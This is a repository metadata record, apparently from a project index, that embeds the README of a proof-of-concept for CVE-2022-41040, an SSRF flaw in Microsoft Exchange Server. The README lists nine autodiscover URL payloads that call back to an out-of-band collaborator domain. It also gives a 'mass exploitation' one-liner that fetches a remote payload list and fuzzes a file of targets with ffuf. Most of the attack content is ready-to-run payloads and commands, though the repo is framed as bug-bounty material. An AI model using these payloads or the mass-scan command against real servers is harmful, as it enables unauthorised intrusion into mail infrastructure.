{"id":13845201,"url":"https://github.com/kljunowsky/CVE-2022-41040-POC","last_synced_at":"2025-07-12T01:31:56.792Z","repository":{"id":61726462,"uuid":"548444286","full_name":"kljunowsky/CVE-2022-41040-POC","owner":"kljunowsky","description":"CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server","archived":false,"fork":false,"pushed_at":"2023-01-21T01:57:59.000Z","size":4,"stargazers_count":88,"open_issues_count":1,"forks_count":13,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-11-21T18:39:03.791Z","etag":null,"topics":["bug-bounty","bugbounty","cve-2022-41040","exploit","hacking","microsoft","microsoft-exchange","poc","proof-of-concept","security","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kljunowsky.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-10-09T15:27:40.000Z","updated_at":"2024-08-12T20:27:40.000Z","dependencies_parsed_at":"2023-02-12T07:30:25.409Z","dependency_job_id":null,"html_url":"https://github.com/kljunowsky/CVE-2022-41040-POC","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/kljunowsky/CVE-2022-41040-POC","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kljunowsky%2FCVE-2022-41040-POC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kljunowsky%2FCVE-2022-41040-POC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kljunowsky%2FCVE-2022-41040-POC/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kljunowsky%2FCVE-2022-41040-POC/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kljunowsky","download_url":"https://codeload.github.com/kljunowsky/CVE-2022-41040-POC/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kljunowsky%2FCVE-2022-41040-POC/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264923076,"owners_count":23683716,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","bugbounty","cve-2022-41040","exploit","hacking","microsoft","microsoft-exchange","poc","proof-of-concept","security","ssrf"],"created_at":"2024-08-04T17:03:16.019Z","updated_at":"2025-07-12T01:31:56.463Z","avatar_url":"https://github.com/kljunowsky.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# CVE-2022-41040-POC\nCVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server\n\n## Manual exploiation \n\n1. Replace `COLLABHERE` with your OOB domain - `sed 's/COLLABHERE/\u003coob-domain\u003e/g`\n\n2. Add payloads next to URLs you want to test - `echo http://target.com|unfurl format %s://%d/\u003cpayload\u003e`\n\n3. Visit crafted URLs\n\n4. Check your collaborator\n\nPayloads:\n```\n/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/\u0026Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE\n/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1\n/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?\u0026Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026Protocol=Powershell\n/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?\u0026Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026Protocol=Powershell\n/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?\u0026Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026%d.v5.COLLABHEREProtocol=Powershell\n/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?\u0026Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026%d.v6.COLLABHEREProtocol=Powershell\n/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?\u0026Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026%d.v7.COLLABHEREProtocol=Powershell\n/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?\u0026Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026%d.v8.COLLABHEREProtocol=Powershell\n/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE\u0026Protocol=Autodiscoverv1\u0026Protocol=Powershell\n```\n\n## Mass exploitation\n\n```\nfor url in $(curl -s https://gist.githubusercontent.com/kljunowsky/a2e8392f63fb8d7c0443f2011bce59ec/raw/7b4cabaa0dab7113b1cab00e1a2cb0c4e3c6ed06/cve-2022-41040-unfurl-payloads.txt|sed 's/COLLABHERE/\u003cOOB-PAYLOAD\u003e/g'); do cat targets.txt |unfurl format $url \u003e\u003e fuzz-ready.txt;done \u0026 ffuf -w fuzz-ready.txt -u FUZZ\n```\n\nCheck your collaborator!\n\nHappy hunting!\n\n### Requirements\n[ffuf](https://github.com/ffuf/ffuf)\nThanks [@joohoi](https://github.com/joohoi)!\n\n\n[unfurl](https://github.com/tomnomnom/unfurl)\nThanks [tomnomnom](https://github.com/tomnomnom)!\n\n[Twitter](https://twitter.com/milanshiftsec)\n\n[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkljunowsky%2FCVE-2022-41040-POC","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkljunowsky%2FCVE-2022-41040-POC","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkljunowsky%2FCVE-2022-41040-POC/lists"}